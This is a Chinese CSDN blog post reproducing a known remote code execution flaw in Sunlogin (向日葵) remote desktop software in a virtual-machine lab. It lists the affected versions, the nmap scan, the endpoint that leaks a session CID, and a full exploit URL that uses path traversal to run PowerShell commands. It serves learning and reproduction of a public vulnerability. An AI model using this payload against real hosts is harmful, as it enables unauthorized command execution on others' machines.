向日葵RCE复现

该实验在虚拟环境中安装了特定版本的向日葵软件,并通过本机的nmap工具进行端口扫描。实验者通过获取session值CID,构造payload并结合cookie发送恶意命令,利用向日葵的漏洞尝试执行远程命令,例如执行`ipconfig`。实验展示了网络安全中针对远程桌面工具的潜在风险。
摘要由CSDN通过智能技术生成

本次实验在虚拟机上安装向日葵,用本机nmap进行扫描

虚拟机上的向日葵版本要符合:

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.43315(2021.12)

在虚拟机上打开向日葵

然后在本机上用nmap扫描(扫描的为虚拟机ip)

然后用浏览器一个个的尝试访问

ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)

 有了CID然后进行添加到payload和cookie发送

http://虚拟机ip:端口(这里是192.168.118.135:49555)/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20ipconfig
 

 实验结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值